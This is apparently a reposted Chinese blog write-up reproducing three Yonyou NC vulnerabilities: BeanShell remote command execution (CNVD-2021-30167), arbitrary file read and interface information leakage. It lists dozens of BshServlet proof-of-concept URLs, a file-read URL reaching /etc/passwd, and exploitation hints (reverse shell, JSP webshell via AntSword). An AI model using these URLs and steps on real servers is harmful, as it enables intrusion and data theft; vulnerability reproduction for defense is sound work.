用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露

这篇具有很好参考价值的文章主要介绍了用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。

用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露

命令执行漏洞复现

漏洞POC

 http://x.x.x.x/service/~aim/bsh.servlet.BshServlet
 http://x.x.x.x/service/~alm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~ampub/bsh.servlet.BshServlet
 http://x.x.x.x/service/~arap/bsh.servlet.BshServlet
 http://x.x.x.x/service/~aum/bsh.servlet.BshServlet
 http://x.x.x.x/service/~cc/bsh.servlet.BshServlet
 http://x.x.x.x/service/~cdm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~cmp/bsh.servlet.BshServlet
 http://x.x.x.x/service/~ct/bsh.servlet.BshServlet
 http://x.x.x.x/service/~dm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~erm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fa/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fac/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fbm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~ff/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fip/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fipub/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fp/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fts/bsh.servlet.BshServlet
 http://x.x.x.x/service/~fvm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~gl/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrhi/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrjf/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrpd/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrpub/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrtrn/bsh.servlet.BshServlet
 http://x.x.x.x/service/~hrwa/bsh.servlet.BshServlet
 http://x.x.x.x/service/~ia/bsh.servlet.BshServlet
 http://x.x.x.x/service/~ic/bsh.servlet.BshServlet
 http://x.x.x.x/service/~iufo/bsh.servlet.BshServlet
 http://x.x.x.x/service/~modules/bsh.servlet.BshServlet
 http://x.x.x.x/service/~mpp/bsh.servlet.BshServlet
 http://x.x.x.x/service/~obm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~pu/bsh.servlet.BshServlet
 http://x.x.x.x/service/~qc/bsh.servlet.BshServlet
 http://x.x.x.x/service/~sc/bsh.servlet.BshServlet
 http://x.x.x.x/service/~scmpub/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so2/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so3/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so4/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so5/bsh.servlet.BshServlet
 http://x.x.x.x/service/~so6/bsh.servlet.BshServlet
 http://x.x.x.x/service/~tam/bsh.servlet.BshServlet
 http://x.x.x.x/service/~tbb/bsh.servlet.BshServlet
 http://x.x.x.x/service/~to/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uap/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapbd/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapde/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapeai/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapother/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapqe/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapweb/bsh.servlet.BshServlet
 http://x.x.x.x/service/~uapws/bsh.servlet.BshServlet
 http://x.x.x.x/service/~vrm/bsh.servlet.BshServlet
 http://x.x.x.x/service/~yer/bsh.servlet.BshServlet

访问出现这个页面

用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露

可能存在漏洞(还有一种情况是,存在这个界面但不能执行命令)

用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露

漏洞利用思路

1.使用反弹Shell方式进行获取权限。

2.关于Webshell,在权限足够的条件下,可以尝试写入JSP木马,通过蚁剑连接,拿到Shell。

任意文件读取漏洞

filename参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件

poc:文章来源地址https://www.toymoban.com/news/detail-504022.html

http://x.x.x.x:xxxx/NCFindWeb?service=IPreAlertConfigService&filename=/
用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露

如图所示,可以读取到根目录下所有文件,也可以读取到文件内容。

接口信息泄露

poc:

http://x.x.x.x:xxxx/uapws/service
用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露

到了这里,关于用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 用友NC NCCLOUD BIP ldap公共入口uapjs漏洞补丁

    补丁名称 问题描述 发布时间 产品版本 领域 模块 nc65_sysFunctionManager下标越界和空指针合集补丁 2023-3-23 10:03 NC6.5 集团采供 库存管理 nc633_ldap公共入口漏洞补丁 nc633_ldap公共入口漏洞补丁 2023-3-20 16:59 NC6.33 UAP 基础技术框架 nc65_ldap公共入口漏洞补丁 nc65_ldap公共入口漏洞补丁 20

    2024年02月13日
    浏览(38)
  • GoAhead远程命令执行漏洞(CVE-2021-42342)

    目录 GoAhead远程命令执行漏洞(CVE-2021-42342) 漏洞描述 漏洞复现 启动环境 复现漏洞 漏洞主要是由于上传过滤器没有设置不受信任的var位绕过CGI处理程序的前缀检测,渗透人员可以利用这个漏洞在未授权的情况下,构造恶意程序数据执行远程命令执行攻击,进而获得服务器的最

    2024年02月09日
    浏览(42)
  • CVE-2021-22205 GitLab 远程命令执行漏洞复现

    目录 一、漏洞信息 二、环境搭建 三、复现过程 1.测试漏洞 2.漏洞利用,反弹shell 四、修复建议 一、漏洞信息 漏洞名称 GITLAB 远程命令执行漏洞 漏洞编号 CVE-2021-22205 危害等级 高危 CVSS评分 6.5 漏洞厂商 Ruby 受影响版本 11.9 = Gitlab CE/EE 13.8.8;13.9 = Gitlab CE/EE 13.9.6;13.10 = Gitlab

    2024年02月05日
    浏览(44)
  • CVE-2021-40444分析报告微软MHTML远程命令执行漏洞

    2021 年 8 月 21 日,MSTIC 观察到一名 Mandiant 员工在社交媒体上发布的帖子,该员工具有跟踪 Cobalt Strike Beacon 基础设施的经验。所写文章重点介绍了一个于 2021 年 8 月 19 日上传到 VirusTotal的 Microsoft Word 文档(SHA-256:3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf)。 MSTIC 对样

    2024年02月08日
    浏览(37)
  • CVE-2021-44228 Apache log4j 远程命令执行漏洞

    一、漏洞原理 log4j(log for java)是由Java编写的可靠、灵活的日志框架,是Apache旗下的一个开源项目,使用Log4j,我们更加方便的记录了日志信息,它不但能控制日志输出的目的地,也能控制日志输出的内容格式;通过定义不同的日志级别,可以更加精确的控制日志的生成过程,

    2024年02月08日
    浏览(55)
  • Sangfor华东天勇战队:h2数据库console命令执行( CVE-2021-42392 漏洞)

    1.1.100 = H2 Console = 2.0.204 此处复现版本1.4.197 启动项目如下 在Driver Class中输入javax.naming.InitialContext 在JDBCURL中输入jndi注入恶意链接 生成链接命令: 因为项目环境是jdk1.7,因此我们用1.7的jndi,其他版本均不生效 通过漏洞公布,可以看到是在org.h2.util.JdbcUtils.getConnection的javax.na

    2024年02月11日
    浏览(34)
  • Log4j反序列化命令执行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码 环境:vulhub 工具下载地址: ysoserial 利用工具生成payload: 1.创建文件 进入容器内部,查看文件创建成功 2.查看反弹的shell 有点

    2024年02月11日
    浏览(48)
  • 用友NC65登录界面的jsp页面路径

    如上图,访问地址 http://127.0.0.1/portal/app/mockapp/login.jsp?lrid=1对应的页面是哪个呢??相信很多做用友portal端开发的人可能都没有研究或者思考过这个问题,或者想过,但是不知道路径在哪里。你直接按地址栏的地址查,发现nchome里,并没有”portal/app/mockapp/“这个路径。 其实,

    2024年02月15日
    浏览(41)
  • HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)

    2023年将会持续于B站、CSDN等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力。 GET访问/x.asp

    2024年02月12日
    浏览(45)
  • 用友 NC bsh.servlet.BshServlet RCE利用

    用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,该漏洞为远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大。 影响版本:用友 NC6.

    2024年02月13日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包